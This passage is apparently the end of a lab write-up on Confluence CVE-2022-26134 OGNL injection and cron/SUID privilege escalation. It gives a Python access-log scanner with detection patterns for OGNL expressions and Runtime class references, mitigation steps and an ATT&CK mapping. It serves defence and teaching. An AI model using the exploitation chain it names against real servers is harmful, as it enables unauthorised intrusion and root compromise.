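CLASS_REF_RE = re.compile(r"@[A-Za-z_]\w*(?:\.[A-Za-z_]\w*)+@")  # @java.lang.Runtime@ style static reference


def fully_decode(uri, max_rounds=3):
    """Percent-decode until the string stops changing, so double encoding does not hide the payload."""
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def classify_uri(uri):
    """Return a finding dict if the URI carries an OGNL expression, else None."""
    decoded = fully_decode(uri)
    expr = OGNL_EXPR_RE.search(decoded)
    if not expr:
        return None
    return {
        "uri": uri,
        "decoded": decoded,
        "expression": expr.group(0),
        "class_reference": bool(CLASS_REF_RE.search(expr.group(0))),
        "double_encoded": unquote(uri) != decoded,
    }


def scan_access_log(text):
    """Findings, one per log line whose request URI decodes to an OGNL expression."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = classify_uri(m.group("uri"))
        if finding:
            finding["line"] = lineno
            finding["method"] = m.group("method")
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        flags = ["class-ref" if f["class_reference"] else "", "double-enc" if f["double_encoded"] else ""]
        print(f"line {f['line']}: {f['method']} {f['decoded']}  [{' '.join(x for x in flags if x)}]")
```

A static class reference (@java.lang.Runtime@) inside the expression is the strongest signal and is worth alerting on alone; a bare ${...} in a path should at least be counted per source address, since the Metasploit check routine and the Python script both send such a request before the real payload.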

Mitigation Recommendations

Immediate Actions:

  1. Update Confluence: Upgrade to a patched version (7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later)
  2. Change Script Ownership: chown root:root /opt/log-backup.sh && chmod 744 /opt/log-backup.sh
  3. Remove SUID Bit: chmod u-s /bin/bash
  4. Review Cron Jobs: Audit all cron jobs for security issues
  5. Check for Compromise: Search logs for OGNL exploitation attempts
  6. Password Rotation: Change all service account passwords

Long-term Security Improvements:

  1. Web Application Firewall (WAF): Deploy ModSecurity or similar with OGNL detection rules
  2. Intrusion Detection System (IDS): Implement Snort/Suricata with CVE-2022-26134 signatures
  3. File Integrity Monitoring: Deploy AIDE, Tripwire, or OSSEC
  4. Least Privilege Cron: Run cron jobs with minimum required privileges
  5. Immutable Scripts: Use chattr +i on critical system scripts
  6. Network Segmentation: Place Confluence in DMZ with strict firewall rules
  7. Regular Security Audits: Conduct quarterly penetration tests
  8. Vulnerability Scanning: Implement automated vulnerability scanning
  9. Patch Management: Establish process for rapid security update deployment
  10. Security Training: Educate administrators on secure configuration practices
  11. Logging and SIEM: Centralized logging with correlation and alerting
  12. Backup and Recovery: Regular backups with tested restore procedures

MITRE ATT&CK Mapping

Initial Access:

  • T1190: Exploit Public-Facing Application (CVE-2022-26134)

Execution:

  • T1059.004: Command and Scripting Interpreter: Unix Shell
  • T1053.003: Scheduled Task/Job: Cron

Persistence:

  • T1053.003: Scheduled Task/Job: Cron (modified script)

Privilege Escalation:

  • T1053.003: Scheduled Task/Job: Cron
  • T1548.001: Abuse Elevation Control Mechanism: Setuid and Setgid

Discovery:

  • T1083: File and Directory Discovery
  • T1057: Process Discovery

Collection:

  • T1005: Data from Local System

Command and Control:

  • T1071.001: Application Layer Protocol: Web Protocols
  • T1059.004: Command and Scripting Interpreter: Unix Shell

Lab Completed Successfully

Tags: #Linux #Confluence #CVE-2022-26134 #OGNL #RCE #Cronjob #PrivilegeEscalation #SUID #Metasploit #WebExploitation